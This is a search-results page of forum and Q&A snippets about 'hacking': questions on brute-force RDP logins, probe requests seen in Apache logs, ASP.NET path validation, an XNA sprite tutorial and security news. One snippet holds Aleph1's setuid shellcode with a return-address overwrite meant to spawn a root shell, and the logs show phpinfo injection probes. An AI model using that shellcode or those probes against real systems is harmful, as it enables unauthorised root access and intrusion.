Search Results

Search found 629 results on 26 pages for 'hacking'.


  • Software Life-cycle of Hacking

    - by David Kaczynski
    At my local university, there is a small student computing club of about 20 students. The club has several small teams with specific areas of focus, such as mobile development, robotics, game development, and hacking / security. I am introducing some basic agile development concepts to a couple of the teams, such as user stories, estimating complexity of tasks, and continuous integration for version control and automated builds/testing. I am familiar with some basic development life-cycles, such as waterfall, spiral, RUP, agile, etc., but I am wondering if there is such a thing as a software development life-cycle for hacking / breaching security. Surely, hackers are writing computer code, but what is the life-cycle of that code? I don't think that they would be too concerned with maintenance, as once the breach has been found and patched, the code that exploited that breach is useless. I imagine the life-cycle would be something like:

      - Find gap in security
      - Exploit gap in security
      - Procure payload
      - Utilize payload

    I propose the following questions: What kind of formal definitions (if any) are there for the development life-cycle of software when the purpose of the product is to breach security?


  • Are these hacking attempts or something less sinister?

    - by Darkcat Studios
    I just had a look through our web server error logs, and Terminal Services is reporting:

      "Remote session from client name a exceeded the maximum allowed failed logon attempts. The session was forcibly terminated."

    Hundreds of times, every 10.5 seconds or so for a period of about 5-10 minutes, once at 2pm yesterday and once again at about 1am this morning. We CURRENTLY have RDP open to the outside, as I am just completing the setup and now and then I/others need to jump on from an outside office/location (VPN isn't an option). As these are so regular, am I right in assuming that they may be the result of some sort of dictionary attack? Or could something like an internal admin's hung session cause such a mass of events? (Win Server 2008 R2)


  • (200 ok) ACCEPTED - Is this a hacking attempt?

    - by Byran
    I assume this is some type of hacking attempt. I've tried to Google it but all I get are sites that look like they have been exploited already. I'm seeing requests to one of my pages that look like this:

      /listMessages.asp?page=8&catid=5+%28200+ok%29+ACCEPTED

    The '(200 ok) ACCEPTED' is what is odd. But it does not appear to do anything. I'm running on IIS 5 and ASP 3.0. Is this "hack" meant for some other type of web server?


  • Hacking prevention, forensics, auditing and counter measures.

    - by tmow
    Recently (but it is also a recurrent question) we saw 3 interesting threads about hacking and security:

      - My server's been hacked EMERGENCY.
      - Finding how a hacked server was hacked
      - File permissions question

    The last one isn't directly related, but it highlights how easy it is to mess up a web server's administration. As there are several things that can be done before something bad happens, I'd like to have your suggestions in terms of good practices to limit backside effects of an attack and how to react in the sad case it happens. It's not just a matter of securing the server and the code but also of auditing, logging and counter measures. Do you have any good practices list or do you prefer to rely on software or on experts that continuously analyze your web server(s) (or nothing at all)? If yes, can you share your list and your ideas/opinions?


  • should i bother to block these- rather lame attempt at hacking my server

    - by The Journeyman geek
    I'm running a LAMP stack, with no phpmyadmin (yes) installed. While poking through my Apache server logs I noticed things like:

      74.208.75.29 - - [16/Mar/2010:02:53:45 +0800] "POST http://74.208.75.29:6667/ HTTP/1.0" 404 481 "-" "-"
      74.208.75.29 - - [16/Mar/2010:02:53:45 +0800] "CONNECT 74.208.75.29:6667 HTTP/1.0" 405 547 "-" "-"
      66.184.178.58 - - [16/Mar/2010:13:27:59 +0800] "GET / HTTP/1.1" 200 1170 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
      200.78.247.148 - - [16/Mar/2010:15:26:05 +0800] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 506 "-" "-"
      206.47.160.224 - - [16/Mar/2010:17:27:57 +0800] "GET / HTTP/1.1" 200 1170 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:02 +0800] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 480 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:03 +0800] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 476 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:04 +0800] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:05 +0800] "GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:05 +0800] "GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:06 +0800] "GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 482 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

    What exactly is happening? Is it a really lame attempt at hacking in? Should I bother blocking the IP addresses these are from, or just leave it?


  • Handle URI hacking gracefully in ASP.NET

    - by asbjornu
    I've written an application that handles most exceptions gracefully, with the page's design intact and a pretty error message. My application catches them all in the Page_Error event and there adds the exception to HttpContext.Current.Context.Items and then does a Server.Transfer to an Error.aspx page. I find this to be the only viable solution in ASP.NET as there seems to be no other way to do it in a centralized and generic manner. I also handle the Application_Error and there I do some inspection on the exception that occurred to find out if I can handle it gracefully or not. Exceptions I've found I can handle gracefully are such that are thrown after someone hacking the URI to contain characters the .NET framework considers dangerous or basically just illegal at the file system level. Such URIs can look like e.g.:

      http://example.com/"illegal"
      http://example.com/illegal"/
      http://example.com/illegal /

    (notice the space before the slash at the end of the last URI). I'd like these URIs to respond with a "404 Not Found" and a friendly message as well as not causing any error report to be sent to avoid DDOS attack vectors and such. I have, however, not found an elegant way to catch these types of errors. What I do now is inspect the exception.TargetSite.Name property, and if it's equal to CheckInvalidPathChars, ValidatePath or CheckSuspiciousPhysicalPath, I consider it a "path validation exception" and respond with a 404. This seems like a hack, though. First, the list of method names is probably not complete in any way and second, there's the possibility that these method names get replaced or renamed down the line which will cause my code to break. Does anyone have an idea how I can handle this in a less hard-coded and much more future-proof way? PS: I'm using System.Web.Routing in my application to have clean and sensible URIs, if that is of any importance to any given solution.


  • I have this code .... Ethical Hacking

    - by kmitnick
    Hello folks, I am following this EBook about Ethical Hacking, and I reached the Linux Exploit Chapter, this is the code with Aleph1's code.

      //shellcode.c
      char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.
      "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      int main() { //main function
          int *ret; //ret pointer for manipulating saved return.
          ret = (int *)&ret + 2; //setret to point to the saved return
                                 //value on the stack.
          (*ret) = (int)shellcode; //change the saved return value to the
                                   //address of the shellcode, so it executes.
      }

    I give this the super user privileges, with chmod u+s shellcode as a super user, then go back to normal user with su - normal_user, but when I run ./shellcode I should be a root user but instead I am still normal_user, so any help?? BTW I am working on BT4-Final, I turned off the ASLR, and running BT4 in VMWare...


  • Is it worth hiring a hacker to perform some penetration testing on my servers ?

    - by Brann
    I'm working in a small IT company with paranoid clients, so security has always been an important consideration to us; in the past, we've already mandated two penetration tests from independent companies specialized in this area (Dionach and GSS). We've also run some automated penetration tests using Nessus. Those two auditors were given a lot of insider information, and found almost nothing* ... While it feels comfortable to think our system is perfectly sure (and it was surely comfortable to show those reports to our clients when they performed their due diligence work), I've got a hard time believing that we've achieved a perfectly sure system, especially considering that we have no security specialist in our company (security has always been a concern, and we're completely paranoid, which helps, but that's as far as it goes!) If hackers can hack into companies that probably employ at least a few people whose sole task is to ensure their data stays private, surely they could hack into our small business, right? Does someone have any experience in hiring an "ethical hacker"? How to find one? How much would it cost?

    *The only recommendation they made us was to upgrade our remote desktop protocols on two Windows servers, which they were able to access because we gave them the correct non-standard port and whitelisted their IP


  • Hacking your own application

    - by instigator
    I am a web developer that is very conscious of security and try to make my web applications as secure as possible. However, I have started writing my own Windows applications in C# and when it comes to testing the security of my C# application, I am really only a novice. Just wondering if anyone has any good tutorials/readmes on how to hack your own Windows application and writing secure code.


  • piece of php code for prevent hacking.

    - by artmania
    Hi friends, I have a PHP file at my site, and I connect to the db, get some records and list them in the same file.

      mysql_connect("localhost", "blabla", "blabla") or die(mysql_error());
      mysql_select_db("blabla") or die(mysql_error());
      $blabla1 = mysql_query("SELECT * FROM gallery WHERE id_cat=1");
      $blabla2 = mysql_query("SELECT * FROM gallery WHERE id_cat=2");
      $blabla3 = mysql_query("SELECT * FROM gallery WHERE id_cat=3");

    So, is there anything I need to do for security? :/ Like SQL injection or anything else. There is nothing going to the URL. It is just www.blabla.com/gallery.php. Appreciate advice!!! Thanks a lot!


  • Amateur developers take up hacking with the proliferation of hacking kits "all-i

    Update of 29/04/10. Amateur developers take up hacking with the proliferation of "all-in-one" hacking kits, but they remain very professional. "Do-it-yourself" hacking kits (in French, "faîtes le vous même") are reportedly spreading at great speed. These "all-in-one" solutions do indeed make it easier to create and use malware (an observation also made by Microsoft in its semi-annual security report - read above). Their relatively low prices did the rest in making them accessible to all malicious developers, including the least skilled. In its study, M8...


  • Mythbusters- Programming/hacking myths [closed]

    - by stephen776
    Hey guys. I am a big fan of the Discovery show Mythbusters, as I'm sure some of you are as well. I have always wanted them to do an episode on programming/hacking. They get a lot of their show ideas from fans so I thought we could compile a list of possible myths to bust. Let's hear your ideas! (sorry if this is not appropriate, close if necessary) Edit: I am not necessarily looking for subjective "This is what I want to see" answers. I am talking more along the lines of interesting computer/programming/hacking stories that would appeal to a general audience. I do not expect them to do a show on "What's faster i++ or i + 1".


  • [Book]: Chaînes d'exploits: Scénarios de hacking avancé et prévention, by A.Whitaker, K.Evans, J.Vot

    Hello. The DVP editorial team has read the following book for you: Chaînes d'exploits: Scénarios de hacking avancé et prévention by Andrew Whitaker, Keatron Evans, Jack Voth, published by Editions PEARSON. Quote: A hacker rarely relies on a single attack, but instead uses chains of exploits, which involve several...


  • Pwn2Own 2011: Safari defeated in 5 seconds at the hacking contest, Internet Explorer 8 exploited

    Pwn2Own 2011: Safari defeated in 5 seconds, Internet Explorer 8 exploited. The famous hacking competition Pwn2Own, which takes place once a year in Vancouver, began yesterday. And on this first day, two browsers were given a thoroughly rough time. The computer security specialists taking part in the contest each had to choose a browser to go after. And they... passed over Firefox, which nobody chose! Then, only one decided to take on Chrome, but he never showed up. The other contestants, for their part, concentrated on Internet Explorer and Safari. And Apple's software did not hold out for very long. Thus, on this first day, Safa...


  • Using terminal in hacking way (Xubuntu 10.04)

    - by user1163511
    I am a beginner in using the terminal in Linux. I have some questions about it. First of all, I want to ask you a question outside the issue: What is the name of the Terminal in Xubuntu 10.04 (for example, bash or anything like this)? My main question is: Is there any way of using the terminal for hacking (e.g. port scanning, whois, gaining root account and taking a look at the file system of the server or other things)? I will be very pleased to get answers. Thank you for your patience and tolerance!


  • Kinect Hacking at Microsoft Developer Days 2012 Bulgaria

    - by Szymon Kobalczyk
    Last week I had the pleasure to speak at Microsoft's Developer Days 2012 in Sofia, Bulgaria. It was a great conference and I met lots of cool people there. I did a session about Kinect Hacking. My goal was to give a good understanding of Kinect's inner workings and how it can be used to develop Windows applications. Later I showed examples of interesting projects utilizing the full potential of the Kinect sensor. Below you can find my slides and source code of one of the demos (the one where "Szymon went to the Moon"). But I wasn't the only one to talk about Kinect. On the 2nd day Rob Miles also did a fun session titled "Kinect Mayhem: Psychedelic Ghost Cameras, Virtual Mallets, a Kiss Detector and a Head Tapping Game" (you can watch a recording of this session from TechDays Netherlands on Channel9). Later that day Yishai Galatzer made a big surprise during his session about Extending WebMatrix, and showed a plugin that makes it possible to take control of WebMatrix with Kinect gestures. The best thing was that he wrote it during the conference, with no previous experience with the Kinect SDK (I might have helped him a bit to get started). Thanks for the invitation and I hope to see you soon!


  • Day 3 - XNA: Hacking around with images

    - by dapostolov
    Yay! Today I'm going to get into some code! My mind has been on this all day! I find it amusing how I practice, daily, to be "in the moment" or "present" and the excitement and anticipation of this project seems to snatch it away from me frequently. WELL!!! (Shakes Excitedly) Let's do this =)! Let's code!

    For these next few days it is my intention to better understand image rendering using XNA; after said prototypes are complete I should (fingers crossed) be able to dive into my game code using the design document I hammered out the other night.

    On a personal note, I think the toughest thing right now is finding the time to do this project. Each night, after my little ones go to bed I can only really afford a couple hours of work on this project. However, I hope to utilise this time as best as I can because this is the first time in a while I've found a project that I've been passionate about. A friend recently asked me if I intend to go 3D or extend the game design. Yes. For now I'm keeping it simple.

    Lastly, just as a note, as I was doing some further research into image rendering this morning I came across some other XNA content and lessons learned. I believe this content could have probably been posted in the first couple of posts, however, I will share the new content as I learn it at the end of each day. Maybe I'll take some time later to fix the posts but for now

    Installation and Deployment - Lessons Learned

    I had installed the XNA studio (Day 1) and the site instructions were pretty easy to follow. However, I had a small difficulty with my development environment. You see, I run a virtual desktop development environment. Even though I was able to code and compile all the tutorials the game failed to run...because I lacked a 3D capable card; it was not detected on the virtual box...

    First Lesson: The XNA runtime needs to "see" the 3D card!

    No sweat, I copied the files over to my parent box and executed the program. ERROR. Hmm...

    Second Lesson (which I should have probably known but I let the excitement get the better of me): you need the XNA runtime on the client PC to run the game, oh, and don't forget the .Net Runtime!

    Sprite, it ain't just a Soft Drink...

    With these prototypes I intend to understand and perform the following tasks.

      - learn game development terminology
      - how to place and position (rotate) a static image on the screen
      - how to layer static images on the screen
      - understand image scaling
      - can we reuse images?
      - understand how framerate is handled in XNA
      - how to display text, basic shapes, and colors on the screen
      - how to interact with an image (collision of user input?)
      - how to animate an image and understand basic animation techniques
      - how to detect colliding images or screen edges
      - how to manipulate the image, let's say colors, stretching
      - how to focus on a segment of an image...like only displaying a frame on a film reel
      - what's the best way to manage images (compression, storage, location, prevent artwork theft, etc.)

    Well, let's start with this "prototype" task list for now...Today, let's get an image on the screen and maybe I can mark a few of the tasks as completed...

    C# Prototype1

      - New Visual Studio Project
      - Select the XNA Game Studio 3.1 Project Type
      - Select the Windows Game 3.1 Template
      - Type Prototype1 in the Name textbox provided
      - Press OK.

    At this point code has auto-magically been created. Feel free to press the F5 key to run your first XNA program. You should have a blue screen in front of you. Without getting into the nitty gritty right, the code that was generated basically creates some basic code to clear the window content with the lovely CornFlowerBlue color. Something to notice, when you move your mouse into the window...nothing. ooooo spoooky. Let's put an image on that screen!

    Step A - Get an Image into the solution

    Under "Content" in your Solution Explorer, right click and add a new folder and name it "Sprites". Copy a small image in there; I copied a "Royalty Free" wizard hat from a quick Google search and named it wizards_hat.jpg (rightfully so!)

    Step B - Add the sprite and position fields

    Now, open/edit Game1.cs. Locate the following line: SpriteBatch spriteBatch; Under this line type the following:

        SpriteBatch spriteBatch; // the line you are looking for...
        Texture2D sprite;
        Vector2 position;

    Step C - Load the image asset

    Locate the "Load Content" Method and duplicate the following:

        protected override void LoadContent()
        {
            spriteBatch = new SpriteBatch(GraphicsDevice);
            // your image name goes here...
            sprite = Content.Load<Texture2D>("Sprites\\wizards_hat");
            position = new Vector2(200, 100);
            base.LoadContent();
        }

    Step D - Draw the image

    Locate the "Draw" Method and duplicate the following:

        protected override void Draw(GameTime gameTime)
        {
            GraphicsDevice.Clear(Color.CornflowerBlue);
            spriteBatch.Begin(SpriteBlendMode.AlphaBlend);
            spriteBatch.Draw(sprite, position, Color.White);
            spriteBatch.End();
            base.Draw(gameTime);
        }

    Step E - Compile and Run

    Engage! (F5) - Debug! Your image should now display on a cornflowerblue window about 200 pixels from the left and 100 pixels from the top. Awesome! =)

    Pretty cool how we only coded a few lines to display an image, but believe me, there is plenty going on behind the scenes. However, for now, I'm going to call it a night here. Blogging all this progress certainly takes time... However, tomorrow night I'm going to detail what we just did, plus start checking off points on that list! I'm wondering right now if I should add pictures / code to this post...let me know if you want them =)

    Best Regards, D.


  • What are unique aspects of a software Lifecycle of an attack/tool on a software vulnerability?

    - by David Kaczynski
    At my local university, there is a small student computing club of about 20 students. The club has several small teams with specific areas of focus, such as mobile development, robotics, game development, and hacking / security. I am introducing some basic agile development concepts to a couple of the teams, such as user stories, estimating complexity of tasks, and continuous integration for version control and automated builds/testing. I am familiar with some basic development life-cycles, such as waterfall, spiral, RUP, agile, etc., but I am wondering if there is such a thing as a software development life-cycle for hacking / breaching security. Surely, hackers are writing computer code, but what is the life-cycle of that code? I don't think that they would be too concerned with maintenance, as once the breach has been found and patched, the code that exploited that breach is useless. I imagine the life-cycle would be something like:

      - Find gap in security
      - Exploit gap in security
      - Procure payload
      - Utilize payload

    What kind of differences (if any) are there for the development life-cycle of software when the purpose of the product is to breach security?

